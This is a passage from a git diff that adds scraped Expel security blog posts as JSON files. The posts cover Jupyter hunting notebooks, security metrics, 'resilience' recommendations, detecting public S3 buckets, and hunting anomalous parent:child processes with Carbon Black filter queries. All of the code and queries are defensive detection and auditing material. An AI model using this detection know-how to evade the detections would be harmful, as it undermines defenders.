Step 5: Build and Run Our Hunting Notebooks So now we have the instructions written in order to build our new hunting notebooks. Let\u2019s build and run them in Jupyter! The Docker instructions are designed to build the hunting notebooks when you run the Jupyter notebook service, using this command: \u201cdocker-compose run \u2010\u2010service-ports notebook.\u201d Command line example of build process When we use the Jupyter notebook link, we can see our newly created notebook files in our file tree. Jupyter notebook server and new hunting notebooks Select one of the \u201c*.ipynb\u201d files to view the hunting technique notebook in Jupyter. Example of running built notebook If you need to make a change to one specific notebook or hunting technique, all you need to do is update the specific configuration file for the technique and re-run the notebook service to rebuild the notebooks. If you need to make a change to your core code base, you can modify your \u201cnotebook_builder.py\u201d build script and re-run the notebook service. This way you can ensure that your notebooks will be rebuilt the same way and will run on the latest version of the build. Optional last step (a bonus!): Add to Deployment Pipeline If your organization has a pipeline for continuous integration, such as using CircleCI , your organization can configure the build to run following your change review process. This ensures that your end users are always working off of the latest deployment of your notebooks. Final thoughts Whether you\u2019re using notebooks for customer analytics, performance analytics, data science, threat hunting, sales projections or machine learning, Jupyter notebooks can be really helpful for sharing, presenting and collaborating on data. We hope this post helps take some of the time and stress out of managing your notebooks and allows you more time to actually engage with your data. Huge shout out to everyone who helped put Infosec Jupyterthon 2020 together and to the attendees who gave me the inspiration to write this post. The event was a blast, and we hope to see you all again soon! Have more questions? Let us know !" +} \ No newline at end of file diff --git a/how-to-create-and-share-good-cybersecurity-metrics.json b/how-to-create-and-share-good-cybersecurity-metrics.json new file mode 100644 index 0000000000000000000000000000000000000000..3470503abd228602699f32c71667fb41155e8239 --- /dev/null +++ b/how-to-create-and-share-good-cybersecurity-metrics.json @@ -0,0 +1,6 @@ +{ + "title": "How to create (and share) good cybersecurity metrics", + "url": "https://expel.com/blog/how-to-create-and-share-good-cybersecurity-metrics/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG How to create (and share) good cybersecurity metrics Tips \u00b7 6 MIN READ \u00b7 MATT PETERS \u00b7 MAR 2, 2021 \u00b7 TAGS: MDR / Metrics If you search for \u201chow to measure cybersecurity\u201d or \u201ccybersecurity metrics,\u201d you\u2019ll wind up with an endless list of resources that all claim to have the definitive collection of metrics you should use to measure your cybersecurity program. I\u2019m not going to specifically tell you what you should measure. The devil is in the details \u2013 every process has its hidden complexities that keep any \u201cone size fits all\u201d approach from working particularly well. Instead, I\u2019m going to share my perspective on what you need to bring to that metrics meeting in order to have a productive, meaningful conversation about the business. 
How I think about cybersecurity metrics (and why) When I think about talking about metrics, my mind naturally moves to art history. As a thought experiment \u2013 take a look at this painting. If you\u2019re not an art history enthusiast, you may just go, \u201cWow, that thing is bananas!\u201d This is a pretty common reaction \u2013 perception overload. If I try to explain the painting by saying, \u201cHey, that\u2019s Medusa\u2019s head right in the middle there,\u201d the problem actually gets worse \u2013 now you\u2019re trying to figure out why Medusa\u2019s head is there. Wasn\u2019t that in a movie or something?!? It\u2019s not that much different attending a slide-driven metrics meeting if we\u2019re not on our game. How to measure cybersecurity Start with context It\u2019s the understanding here that\u2019s missing, which is critical. Whether it\u2019s art history or metrics, we can\u2019t engage the brains of our audience unless we give them some context to connect with. With art, it might be that we just miss out on enjoying a painting, but with metrics, we make decisions based on that (possibly flawed) understanding. Instead of diving right in, what if I introduced the painting to you with this? This oil painting by Sebastiano Ricci is a good example of 18th century Italian painting. It depicts a scene from Greek mythology. During the wedding between Perseus and Andromeda, the happy couple was attacked by a mob led by a jilted suitor. Perseus, located in the center of the image is using the severed head of Medusa (whom he earlier bested in combat to win the hand of Andromeda) to turn some of his attackers to stone. This is seen on the far right of the image, as two of the attacking figures are statues. The attack is ongoing, as seen by the bodies of the wedding guests scattered in the foreground. The painting makes heavy use of diagonal posing to give the impression of movement and action and is a good representation of the late baroque period, where the use of chiaroscuro, or the interaction between light and dark tones in a painting were used to convey mood and meaning. Now the painting starts to make sense. It\u2019s amazing how much detail we can spot once we have a framework to hang the detail on. Now that we know what to look for, we might even notice that one of the attacking soldiers is in the process of being turned to stone, as his arm is half grey and half normal color. In the description of the painting, we provided a brief introduction of who painted the thing, and when. This gives the audience a second to adjust their expectations. If I said, \u201cthis is a neolithic cave painting,\u201d and then showed you this painting, the reaction would\u2019ve been stark. In the context of metrics, this usually sounds like: \u201cWe\u2019re watching our mean-time-to-remediate because it\u2019s key to understanding if our team is overloaded.\u201d How to measure cybersecurity: Articulate the questions you want to answer As you\u2019re thinking about the context you want to offer during the metrics discussion, think about the questions you want answered (or the questions and answers the group might expect of you). For example: Are these metrics of particular importance? What story do the metrics tell us? How did we collect them and from what process? Why do you need two minutes of time to talk about this? We started with an introduction: \u201cThis is a painting of\u2026.\u201d followed by introducing the main characters and offering some smaller details. 
We want to move through the scene with multiple passes, each pass having slightly more detail than the last. We don\u2019t start with, \u201cLook, it\u2019s Medusa\u2019s head!\u201d When talking about a cybersecurity metrics, this might sound like: \u201cThis is a graph of [X], you can see that generally it\u2019s [Y]. One thing to note is [Z].\u201d Studying the data and the graph can help you pinpoint any trends or oddities you might want to share as you\u2019re offering context. For example: What\u2019s the scale of the graph? Are there two scales? Call that out. Is there a trendline we need to be aware of? Are there multiple lines? If so, why? How to measure cybersecurity: Add structure to the discussion Once your audience has the general sense of what\u2019s going on, move on to the big stuff. Let\u2019s use our painting example again. The foreground is dead bodies, the right side is people being turned to stone. This is how the audience is going to get a sense of what\u2019s going on. In a metrics presentation, this might sound like: \u201cYou\u2019ll notice the overall trend is increasing for the period\u2026\u201d or \u201cWe saw a sharp dip, followed by a recovery\u2026\u201d The questions you\u2019ll likely want to think about here are big structures in the graph: Is it periodic? If so, why? Is there a trend? Are there any big dips or spikes? What do we not see that we were expecting? (e.g. \u201cNormally we\u2019re 2x this rate, but not this month because\u2026..\u201d) How to measure cybersecurity: But what does it mean? At the end of the description I shared with you, I talked about why this painting was important \u2013 it\u2019s a good example of the baroque period. The idea is that this part is the invitation for us to consider something larger about the painting \u2013 above the reach of the characters and the action. But why do we care? In a metrics conversation, it sounds like: \u201cWhat does this mean? What are we going to do about it?\u201d Without these questions and answers, metrics are just another nice graph. Questions you want to think about here are: If there\u2019s a trend, what does it relate to? Is it a natural phenomena? Do we expect it to stop? If there are big spikes, what happened? Are they good or bad for business? Do I need to be worried, excited or just informed about what I\u2019m seeing? This is usually where people get stuck. If you\u2019re having trouble coming up with the meaning of the metric or graph, ask yourself two things: What would it take for us to change the value of the metric over the next day/week/quarter? Would we want to? If you can\u2019t answer those two questions, it\u2019s likely you\u2019re showing a metric that isn\u2019t all that useful. What to avoid during your metrics discussion In a metrics meeting, avoid reading data, titles or legends off the graph \u2014 instead, dive into the context. What I didn\u2019t do when describing the painting is say, \u201cThe painting is of a large room. At 10 o\u2019clock you can see through a window to the outside, which is lighter\u2026\u201d Avoid the temptation to use words to describe what people will see. Use words to help them see something they can\u2019t see. We\u2019re trying to understand what the painter was trying to communicate, not what they painted. \u201cIn Baroque art, the artists were experimenting with the use of light and dark colors. 
You can see this at 10 o\u2019clock in this painting, where the view outside is light, contrasting with the dark scene in the room.\u201d How do you know you\u2019re doing it right? What all of this translates to when presenting metrics is a combination of audience engagement and identifying or taking next steps. If you\u2019re on the right track, people will: Ask questions about what you\u2019re presenting. (This is usually a good sign, unless their question is: \u201cWhat the hell?\u201d) Interact with the structure of the metric with an eye toward meaning. This might sound like: \u201cI see this in the graph, what causes it?\u201d or \u201cIs the uptick here a cause for concern?\u201d What does this look like in practice? If we\u2019re doing our job well, then our metrics meetings will sing and our business will prosper. Let\u2019s ditch the painting example and share a real-life example of a metric our team recently presented to our colleagues. What we see below is a time series of the number of unique submissions to our phishing service for the last two months. The counts are given at a weekly granularity, where phishing campaigns consisting of more than one email are rolled up into a single count. The overall trend-line, here plotted in grey, is showing a steady increase \u2013 this is expected, as we\u2019ve added a number of new departments over the period. We also see that the variance is increasing \u2013 the high/low swings increase in size over the back half of the period. We believe this is due to new departments being added over the holiday period. This effect should smooth out over the next few months. Example phishing submissions graph What makes all of that useful? Context: I told you what it was a graph of. I didn\u2019t tell you the high and low watermark \u2013 you can read that. But I did tell you what the numbers meant and how we calculated them. Multiple passes: I told you about the line and what it\u2019s doing, as well as the trend line and what it\u2019s about. Structures and functions: I called attention to the mean and the variance, which are both increasing. Meaning: I told you why the mean and variance were increasing, and what you should think about that. Want to read more of our thoughts on cybersecurity metrics, and how we apply some of this thinking in measuring our own Security Operations Center (SOC)? Check out this post and this post." +} \ No newline at end of file diff --git a/how-to-disrupt-attackers-and-enable-defenders-using.json b/how-to-disrupt-attackers-and-enable-defenders-using.json new file mode 100644 index 0000000000000000000000000000000000000000..1d6659153e3baafa2b2756d2e9ada55e473540a0 --- /dev/null +++ b/how-to-disrupt-attackers-and-enable-defenders-using.json @@ -0,0 +1,6 @@ +{ + "title": "How to disrupt attackers and enable defenders using ...", + "url": "https://expel.com/blog/how-to-use-resilience/", + "date": "Feb 8, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to disrupt attackers and enable defenders using resilience Tips \u00b7 3 MIN READ \u00b7 GRANT OVIATT \u00b7 FEB 8, 2018 \u00b7 TAGS: How to / Managed security / Mission by Grant Oviatt, Ben Brigida, Jon Hencinski We think it\u2019s important for your managed security service provider\u2019s (MSSP) interests to align with yours. Unfortunately, that\u2019s not always the case. It\u2019s easy to fall into the trap (that many MSSPs do) of measuring their value by just pointing to the number of alerts they review and incident reports they produce. 
But what if threats don\u2019t show up on any given Tuesday? Well, among other things, it can shine a spotlight on how misaligned your interests can become\u2026 and it can lead to a discussion that goes something like this: Customer: I\u2019m not getting (m)any alerts. What am I paying you for? MSSP: Hold on a sec. [turns knob to send more low-priority alerts to customer] . Are you getting more alerts now? Customer: Ummm\u2026 yeah. Do you really want to get more alerts and more incidents if you aren\u2019t more compromised (if that sounds familiar check out our post on 5 warning signs your MSSP isn\u2019t the right fit )? We don\u2019t think a managed security provider should be off the hook for delivering value just because things are quiet. Finding bad things is critical. But in our view, detection is only half of the equation. We think a managed security service should make your security better, not busier. And getting better means preventing bad things from happening again (and again) or impacting you in the first place. To do that, you need two things: First, you need a way to identify the root causes of incidents and assess risk (beyond the occasional red team exercise) Second, you need the data to make the case for change (even to people who don\u2019t speak security) That\u2019s why we created resilience. What is resilience? Resilience is our way of making you better even when there aren\u2019t any security incidents. At its core, resilience is comprised of recommendations that describe: A specific security risk The potential impact, and The steps to mitigate it Resilience recommendations do one of two things \u2013 disrupt attackers or enable defenders. Recommendations that disrupt attackers prevent threats from successfully performing their intended goal, while recommendations that enable defenders allow your team (including us) to respond more effectively when they do. Resilience recommendations cover a broad spectrum of security content from Windows settings that reduce the exposure of plain text credentials in-memory to specific configurations for getting the most out of your firewall or endpoint detection and response (EDR) solution. Resilience in action So now you\u2019ve heard a little bit about what resilience is\u2026 let\u2019s talk about how it works. Step 1. Find the root cause and identify how to improve Let\u2019s say Expel detects commodity malware on a host in your environment. We\u2019d validate the event, and notify you. That\u2019s where most MSSPs would stop. But we\u2019ll investigate that activity using your technology to understand how the host was infected and provide remediation steps to remove the problem at hand. In the example above, it turns out the host was compromised when a user downloaded and opened an MS Word document with an embedded macro from a phishing email link. This is where most managed detection and response (MDR) providers would stop. It\u2019s also where resilience kicks in to tell you how this incident could have been prevented altogether. In this case, we found the attack would\u2019ve been disrupted if macros were blocked in MS Office files downloaded from the Internet. We also noticed that your defenders could have responded faster if the Palo Alto Networks firewalls had a URL filtering license. The additional license would have allowed us to detect or block maliciously categorized URLs like the phishing link (who says that identifying risk has to be just a pentesting thing?). 
Where things become more interesting is when you start to tie a bunch of incidents to the same resilience recommendation. Now you can start building a fact-based case for doing something about it \u2013 as long as you\u2019re armed with the right data. Step 2: Arm yourself with data It probably isn\u2019t news to you that blocking MS Office macros is a good idea. We know how hard it can be to implement changes like this in your environment \u2013 especially when there are other business units involved in the decision (talking about you IT). Making the case to get it done is half the battle. To help with that we give you a \u201ctear sheet\u201d for each resilience recommendation. It contains data from your environment and anonymized data from other customers that shows the cost (and risk) of doing nothing about a recommendation. How many of your systems have been impacted? How much time has been spent fixing problems that could have been prevented by addressing the root cause? How have others fared when implementing this recommendation? Conclusion / Executables So that\u2019s a quick overview of how we approach resilience here at Expel. Call us crazy but we just don\u2019t think that being compromised should be a prerequisite for getting value out of your MSSP. That said, you don\u2019t need Expel to put resilience into practice. Here are a couple resilience recommendations our customers have implemented recently to start you off on the path towards security improvement. Resilience example #1: Disrupt attackers Mitigate Microsoft Group Policy Preferences (GPP) vulnerability Resilience example #2: Enable defenders Configure Palo Alto Networks Firewalls to block or alert on C2 URL traffic" +} \ No newline at end of file diff --git a/how-to-find-amazon-s3-bucket-misconfigurations-and-fix.json b/how-to-find-amazon-s3-bucket-misconfigurations-and-fix.json new file mode 100644 index 0000000000000000000000000000000000000000..8476a7d2ca24d7c59041e82f70cffd9d06526b82 --- /dev/null +++ b/how-to-find-amazon-s3-bucket-misconfigurations-and-fix.json @@ -0,0 +1,6 @@ +{ + "title": "How to find Amazon S3 bucket misconfigurations and fix ...", + "url": "https://expel.com/blog/find-amazon-s3-bucket-misconfigurations-fix-them/", + "date": "Mar 6, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to find Amazon S3 bucket misconfigurations and fix them ASAP Tips \u00b7 8 MIN READ \u00b7 PETER MICHALSKI \u00b7 MAR 6, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / SOC / Tools Many of our customers run at least part of their infrastructure in public cloud environments, like Amazon Web Services (AWS) , Google Cloud or Microsoft Azure . And while there are plenty of benefits of using the cloud, there are also unique security concerns that organizations need to be aware of. In short, that same security playbook you were using to chase down alerts on your network, laptops and servers isn\u2019t always going to work once you\u2019ve lifted that data into the cloud. Why? We\u2019ve talked about a few reasons here , but the TL;DR is that your users are the new endpoints. One of the biggest challenges we see with cloud security is that people are unpredictable and prone to, well \u2026 ya know, being human . So we often see security incidents happen that are simply errors made by well-intending employees. While they mean well, these errors can (and do) inadvertently put their organization at risk. 
One of the most common errors that\u2019s been popping up in the news and which we\u2019ve started to see here at Expel is when users accidentally make Amazon S3 buckets public. What\u2019s Amazon S3, why do these breaches happen and how can you protect your own org from making this mistake? We\u2019re laying out all the details for you below. What is Amazon S3? Amazon S3 (\u201cS3\u201d stands for \u201cSimple Storage Service,\u201d BTW) buckets are basically the equivalent of hard drives in the sky. They can be used to store images, videos, websites, backups, new application builds or really anything you want. You can even host a website using Amazon S3, and store all the elements on said website in a bucket. When you create a new Amazon S3 bucket, you\u2019ve got to set a bunch of configurations and settings. You can also adjust the access permissions policies for the bucket and all the data contained in it (more info on all of that right here ). S3 buckets don\u2019t allow public access by default, so if a bucket becomes public, it means a user made a change somewhere along the way. The potential for exposing data through public S3 buckets will always be a risk (even if it\u2019s unintended), but there are a couple steps you can take to quickly identify public-facing S3 buckets and reduce your risk of an incident. Understanding a few details about S3 buckets \u2014 along with some red flags to look out for when users inevitably make them public \u2014 can go a long way towards keeping your org safe. Why do Amazon S3 buckets often wind up public? The short answer? Confusing naming and well-meaning users. Let\u2019s tackle the tricky naming convention first. S3 buckets become public when any permissions are granted to the predefined groups \u201cAuthenticatedUsers\u201d or \u201cAllUsers.\u201d The \u201cAuthenticatedUsers\u201d group represents all AWS accounts, meaning anyone with an AWS account can access that S3 bucket. The \u201cAllUsers\u201d group consists of anyone in the world \u2014 and ya can\u2019t get much more public than that. It\u2019s easy to see how this can cause confusion \u2014 especially if you\u2019re new to cloud. Developers and IT admins have grown up in an (on premise) world where groups with \u201cusers\u201d in the name are limited to only the employees in their organization. So when Joe over in IT accidentally gives \u201cAllUsers\u201d access to the company directory and unwittingly exposes it to anyone with an internet connection, it doesn\u2019t mean he\u2019s a dummy. Well-meaning users is another common way that data stored in S3 buckets becomes public. For example, think about an engineer who\u2019s trying to test something and assigns a bucket to \u201cAuthenticatedUsers\u201d so her new teammate can get quick access to it \u2026 but then forgets to change the settings back. Or perhaps a team member was testing different permissions but they were never reverted. Or maybe the bucket was never configured properly in the first place. You get the idea. There are lots of ways that S3 buckets can become public. How to detect, investigate and respond to Amazon S3 alerts We see a lot of our customers forwarding their AWS logs to a SIEM, which is what we use to query and spot Amazon S3 bucket misconfigurations. This isn\u2019t the only approach but if you\u2019re interested here\u2019s an explanation to get started using Sumo . Alternatively you can use Amazon Elasticsearch Service to implement alerting, and there are other options as well. 
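Alongside log-based alerting, you can also audit bucket ACLs directly and flag any grants to those two predefined groups. Here's a minimal sketch with boto3; note it only checks ACL grants (not bucket policies), so treat it as a starting point rather than a full public-bucket audit:

```python
# Sketch: flag S3 buckets with ACL grants to the AllUsers or
# AuthenticatedUsers groups. Checks ACLs only, not bucket policies.
import boto3

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

s3 = boto3.client("s3")

for bucket in s3.list_buckets()["Buckets"]:
    acl = s3.get_bucket_acl(Bucket=bucket["Name"])
    for grant in acl["Grants"]:
        grantee_uri = grant.get("Grantee", {}).get("URI")
        if grantee_uri in PUBLIC_GROUPS:
            print(f"{bucket['Name']}: {grant['Permission']} granted to {grantee_uri}")
```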
Once set up, you can search for AWS \u201cevents\u201d which contain indicators that an S3 bucket was made public. We\u2019ve outlined one approach on how to do this below but as those auto ads say \u201cyour mileage may vary.\u201d Depending on your tech and how your logs are stored, some of the terms we use may not be the same but should still give you a good idea of what to look for. The first step is to query for the \u201cPutBucketAcl\u201d event. This event notes when access control lists (ACL) are used to grant permissions on an existing bucket. Next, you\u2019ll need to narrow your search so it only focuses on buckets that have been made public. You can do this by searching for one or both of the predefined S3 Groups as follows, \u201chttp://acs.amazonaws.com/groups/global/AuthenticatedUsers\u201d \u201chttp://acs.amazonaws.com/groups/global/AllUsers\u201d From there, you\u2019ll need to sift through to get the necessary info. Below are the fields that\u2019ll give you the most useful information to get started with your investigation along with a sample value. \u201cuserName\u201d: \u201cliza\u201d \u201csourceIPAddress\u201d: \u201cxx.xx.xx.xx\u201d \u201cbucketName\u201d: \u201cfix-it-dear-henry\u201d \u201cURI\u201d: \u201chttp://acs.amazonaws.com/groups/global/AllUsers\u201d \u201cPermission\u201d: \u201cWRITE_ACP\u201d Now you\u2019ve got all the important investigative leads you\u2019ll need to get started. Based on the information you\u2019ve pulled from the logs, you\u2019ll know the following: The user performing the action The source of the activity The bucket that\u2019s being made public The group (such as \u201cAllUsers\u201d) that was granted access The permissions that were set for that bucket. Four red flags we look for when we investigate S3 alerts Now that you\u2019ve got the data, you\u2019re probably wondering what type of user behavior can tip you off when something fishy is going on with an S3 bucket? Based on our experience investigating Amazon S3 alerts, here are four red flags \u2014 big and small \u2014 that we watch for at our customers: 1. Suspicious source IP If the source IP responsible for an ACL change is coming from a network hosting provider for virtual private networks (VPN) such as IPVanish, that\u2019s strange. You\u2019d expect an employee to be configuring their S3 bucket settings from a known ISP, or at the very least a commonly seen VPN IP. An IP that\u2019s located in another country could (depending on your company) raise eyebrows. 2. Unusual user behavior A username in your AWS logs (which will look something like \u201cuserName\u201d: \u201cHenry.Liza@Corp[.]com\u201d or \u201carn:aws:iam::XXXXXXXXXXXX:user/Henry.Liza@Corp[.]com\u201d) will help you identify who in your org is making these changes. If the user is in development operations, production support or another administrative role then maybe it\u2019s okay that they\u2019re making configuration changes \u2026 but it\u2019s definitely worth checking. Alternatively, maybe their role doesn\u2019t fit into one of the categories I described above. In that case, you\u2019ll want to figure out why and how the user has these rights. Go search that user\u2019s past activity. Timelining their recent activity can provide a lot of useful information and context. 3. Interesting bucket names People usually name S3 buckets based on the types of information they put in them. So one way to figure out if an S3 bucket might have sensitive information is to simply look at its name. 
For example, one S3 bucket we recently investigated had \u201ckops state\u201d in the name and the permission level was set to \u201cREAD.\u201d (If you\u2019re not familiar, a quick Google search would reveal that \u201ckops\u201d is a tool used to configure Kubernetes clusters .) The \u201cstate\u201d refers to the information needed to manage those clusters, such as configurations and the keys the org is using to do so. That\u2019s not something you want the general public to be able to access! 4. Unnecessary user permissions granted S3 buckets will have one of five permission types. Three of these are particularly noteworthy: \u201cREAD\u201d, \u201cWRITE\u201d and \u201cFULL_CONTROL.\u201d The \u201cFULL_CONTROL\u201d permission level gives users the abilities associated with the other four permissions, such as to list the objects in the bucket (READ), to edit any object in the bucket (WRITE) and more. The permission(s) granted, coupled with the bucket name, will help you gauge the severity and risk. Amazon S3-related Expel alerts in real life: a quick case study Here at Expel, we recently detected an S3 bucket at one of our customers that was open to the public. Here\u2019s what the investigation looked like \u2026 It started with an alert in the Expel Workbench that looked like this: You can see that the Expel Workbench has already parsed out \u201cSource IP\u201d and \u201cUsername\u201d (two of the four red flags we identified above). In addition you can see that when this user made the S3 bucket \u201cclevername[.]com\u201d public, they set the permission level to \u201cREAD.\u201d At first glance this seems pretty benign. Wouldn\u2019t you want an S3 bucket that appears to hold a website (based on the name, that is) to be public? We collect a lot of context from our customers to help us prioritize the severity of alerts. In this case, we were able to use that context to quickly identify the source IP. It was from the customer\u2019s known public address space. If we didn\u2019t have this context, we could have searched for the IP to see if it was used anywhere else in the customer\u2019s environment. Next, we queried for the user\u2019s recent activity. It turns out that earlier that day, this user had created an S3 bucket with the event \u201cCreateBucket.\u201d We also saw that the user issued other commands such as \u201cGetBucketWebsite,\u201d \u201cPutBucketWebsite\u201d, \u201cGetBucketAcl\u201d and others. The evidence pointed to legitimate user activity \u2014 someone was trying to host a website using S3 buckets and test the access controls. Scanning through the logs, it looked like the user was checking and configuring the bucket\u2019s access controls and policies through commands like \u201cGetBucketPolicyStatus\u201d and \u201cPutBucketAcl.\u201d We found that the user ultimately deleted the bucket. And by using some open source intelligence (OSINT) \u2014 also known as LinkedIn and Google \u2014 we discovered that the user worked in a DevOps role for the customer and that the name of the bucket he made public matched the name of an annual charitable event that our customer was hosting. A new IP was stood up that same day with a similar name, which pointed to that bucket. Based on this intel, we concluded that the user was preparing for the launch of this charitable event, possibly testing for the anticipated influx of new website traffic that the customer usually gets around the time of year that they host this benefit. 
After digging deeper, we safely closed this investigation without having to notify the customer. The public S3 bucket in question was deleted, and the user\u2019s activity was related to legitimate web hosting purposes. How to put a lid on your Amazon S3 buckets If you\u2019re using AWS, keeping an eye out for warning signs that a bucket may have \u201cgone public\u201d should be top of mind. Here are a few pro tips you can implement relatively easily: Create a query in your SIEM (or other tech you may be using) to start surfacing alerts when S3 buckets are made public. You can use the fields I shared earlier or terms from Amazon\u2019s documentation to create your own query. By the way, this Access Control List (ACL) Overview page on the AWS website provides a good overview of what ACLs are, how you should (and shouldn\u2019t) use them and how you can keep an eye out for employees making changes to bucket permissions. Filter the useful information from those logs I mentioned above and check for red flags such as a suspicious IP, unusual user behavior or unexpected permissions changes being made to an S3 bucket. If a bucket in your org was left public or if you suspect that it shouldn\u2019t have been changed in the first place, check with your team to make sure it was intentional. It\u2019s easy for someone to experiment with bucket permissions and then forget to change them back, or leave the bucket public for a little too long. If you\u2019ve got a policy that says you shouldn\u2019t have any public S3 buckets, try using AWS Config to monitor them and make sure employees aren\u2019t accidentally making permissions changes. Want some help keeping an eye on your cloud security ? Check in with your MSSP or your SOC to make sure you\u2019re covered. Don\u2019t have either of those? Let\u2019s talk \u2014 we\u2019d love to help." +} \ No newline at end of file diff --git a/how-to-find-anomalous-process-relationships-in-threat.json b/how-to-find-anomalous-process-relationships-in-threat.json new file mode 100644 index 0000000000000000000000000000000000000000..f279d5336d9a16c58b059389bd9452b312f19b50 --- /dev/null +++ b/how-to-find-anomalous-process-relationships-in-threat.json @@ -0,0 +1,6 @@ +{ + "title": "How to find anomalous process relationships in threat ...", + "url": "https://expel.com/blog/how-to-find-anomalous-process-relationships-threat-hunting/", + "date": "Jul 2, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to find anomalous process relationships in threat hunting Security operations \u00b7 6 MIN READ \u00b7 MARY SINGH \u00b7 JUL 2, 2019 \u00b7 TAGS: Get technical / How to / Hunting / Managed security / SOC Peanut butter and jelly. Wine and cheese. Chips and salsa. Some things just go together. But httpd.exe paired with cmd.exe? Not so much. Finding anomalous process relationships \u2014 or \u201ccommands that don\u2019t belong together\u201d \u2014 might indicate a problem within your environment. I\u2019m talking about big problems such as malware execution, an unknown vulnerability and worst of all \u2026 security policies not being enforced. Wondering how you can detect anomalous parent:child relationships during threat hunting? Here are five steps for doing just that. (By the way, If you need a primer on threat hunting , or are wondering what the heck it is and why you should consider doing it, we\u2019ve got your back. We\u2019ve also got some suggestions on how to choose the right security tech to use for your hunt. 
) Step 1: Prepare Before you dive in, there are a few steps you should take first to make sure you get the most out of your hunt. First, make sure you know what is in your environment. Asset inventory is your friend \u2013 your blunt friend who tells it like it is. Knowing what is in your environment is a prerequisite to any effective hunt because if you don\u2019t know about it, you can\u2019t protect it. If you have a team, make sure you\u2019ve got the right people with the right skill sets ready to hunt. The \u201cright skill sets\u201d depend on who\u2019s on your team and the kind of organization you work for. Regardless of your team structure and industry, though, great hunters usually have a few hallmark personality traits \u2014 he or she is someone who has excellent analysis skills and is familiar with the organization\u2019s IT systems, software and processes. Last but not least, define the goal of your hunt. What do you want to get out of it? And how will those results help your company? Many organizations perform hunting in order to detect what active monitoring didn\u2019t catch, and attempt to reduce \u201cdwell time\u201d for undetected compromises \u2014 or the time that a threat is sitting in your environment unnoticed. Step 2: Get your data To find out which parent:child process pairings are anomalous, you\u2019re gonna have to gather some data. You need specific process data and context that includes: Timestamp Process name Process arguments Parent process name Parent process arguments Hostname User The timestamp, hostname and user context will help you figure out whether the activity you\u2019re investigating is legitimate or not. Those attributes will also help you identify additional activities happening during that time frame, on the same host and/or from the user in question. Now that you know what kind of process data you\u2019re looking for, how do you get it? There are three different ways to collect this process data, including: Direct API access to Endpoint Detection & Response (EDR) vendors that track processes Pro: You\u2019ll get direct access to lots of process information. Con: Depending on the vendor you work with, that company may or may not retain enough historical data to cover the hunt dates you\u2019re looking for. SIEM queries Pro: It\u2019s relatively easy to retrieve historical process data. Con: Your data might be impacted by how the SIEM ingests the raw process data, and how the SIEM handles the query (assuming it\u2019s written properly). Windows security event logs Pro: You can still collect process data using event logs even if you don\u2019t have an EDR tool in place. Cons: Sure, Windows security event logs are another way to collect your data, but: Windows Audit process tracking must be enabled (event IDs 4688/4689 on Windows 10) You need to fully enforce Windows Audit process tracking (using Group Policy, for example) Due to potential log size limits, you need to plan on sending Windows event logs to a centralized logging source, or regularly pull event data using a script such as PowerForensics or OSQuery Step 3: Narrow down your pairs Just like shoes and underwear, it\u2019s possible to have too many pairs of processes. After collecting the process information, I\u2019ve got lots of data. But yikes! There are one hundred million events. One way to narrow down the data is to filter on parent processes.
At Expel, we isolate process pairings with parent processes associated with Microsoft Office, Java, web servers, databases, and Adobe Acrobat. We have found that these parent processes are the most commonly targeted by attackers, but you can adapt this filter as needed. Figure 1 shows an example parent process filter we use at Expel: parent_name:java.exe OR parent_name:javaw.exe OR parent_name:winword.exe OR parent_name:excel.exe OR parent_name:powerpnt.exe OR parent_name:w3wp.exe OR parent_name:httpd.exe OR parent_name:nginx.exe OR parent_name:tomcat.exe OR parent_name:sqlserver.exe OR parent_name:mysqld.exe OR parent_name:postgres.exe OR parent_name:mongod.exe OR parent_name:acrobat.exe OR parent_name:acrord32.exe Figure 1: Example parent process filter, in Carbon Black query format That oughta do it, right? Not quite. There are still one million events to sift through. So let\u2019s filter our data with known legitimate process pairings such as w3wp.exe:csc.exe (\u201ccsc.exe\u201d is a legitimate child process of IIS / \u201cw3wp.exe\u201d). Figure 2 shows another example filter we use at Expel that you could try in your own environment: \u2026AND NOT (parent_name=\"winword.exe\" AND (process_name=\"winword.exe\" OR process_name=\"chrome.exe\" OR process_args=\"*Microsoft Office*\" OR process_name=\"firefox.exe\" OR process_name=\"iexplorer.exe\")) AND NOT (parent_name=\"w3wp.exe\" AND process_name=\"csc.exe\") AND NOT (parent_name=\"powerpnt.exe\" AND (process_name=\"powerpnt.exe\" OR process_name=\"chrome.exe\" OR process_args=\"*Microsoft Office*\" Figure 2: Example parent / child / process arguments filter, in Carbon Black query format In the example above, we added specific process arguments so the data is not over filtered. Over filtering causes false negatives, and may result in an \u201c Oh Noes \u201d moment when your security team (or an IR firm) finds something later that should\u2019ve been caught previously. While over filtering isn\u2019t good, under filtering isn\u2019t ideal, either. When creating filters, consider the hunting time given to the security team, the organization\u2019s risk profile and the likelihood of each type of process being targeted. Customize and adjust your filters after each hunt to make subsequent hunts more reliable, efficient and fun over time. (Seriously, hunting can be fun!) Step 4: Consider further analysis techniques By using tech to automate your filtering, you\u2019ll narrow down your events. Use the security tools you\u2019ve got to enrich or augment process data with items such as reputation, file signature, file path, open source intel and more to help with manual review (or to filter even further). There are a few ways to manually review the resulting process pairings. Depending on the data format, your best bet is to use one of the most reliable tools I\u2019ve found \u2014 Excel. Every analyst has their own way of doing things, but I like to drop all my data into Excel and then sort by parent process, child process and then process arguments. After you highlight items of interest, sort by time, host or username to determine context. Depending on what you find, you may need to pull additional information from the host in question to decide whether the process activity you\u2019re reviewing is malicious or breaks your org\u2019s security policy. Alternatively, you can script the analysis with your programming language of choice. 
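If you do script it, here's a minimal sketch of that same sort-and-review pass in Python with pandas. The CSV file and column names below are assumptions for illustration, so map them to whatever your EDR or SIEM export actually produces.

import pandas as pd

# Filtered process pairings exported from your EDR or SIEM.
df = pd.read_csv("process_pairings.csv")

# Mirror the manual Excel workflow: sort by parent, child, then arguments.
df = df.sort_values(["parent_name", "process_name", "process_args"])

# Stack-count each parent:child pairing so the rare combinations float to
# the top of the review list; the common, boring ones are candidates for
# the next hunt's filter.
counts = (
    df.groupby(["parent_name", "process_name"])
    .size()
    .reset_index(name="count")
    .sort_values("count")
)
print(counts.head(25))

# Pull the full rows (timestamp, hostname, user, arguments) for the rarest
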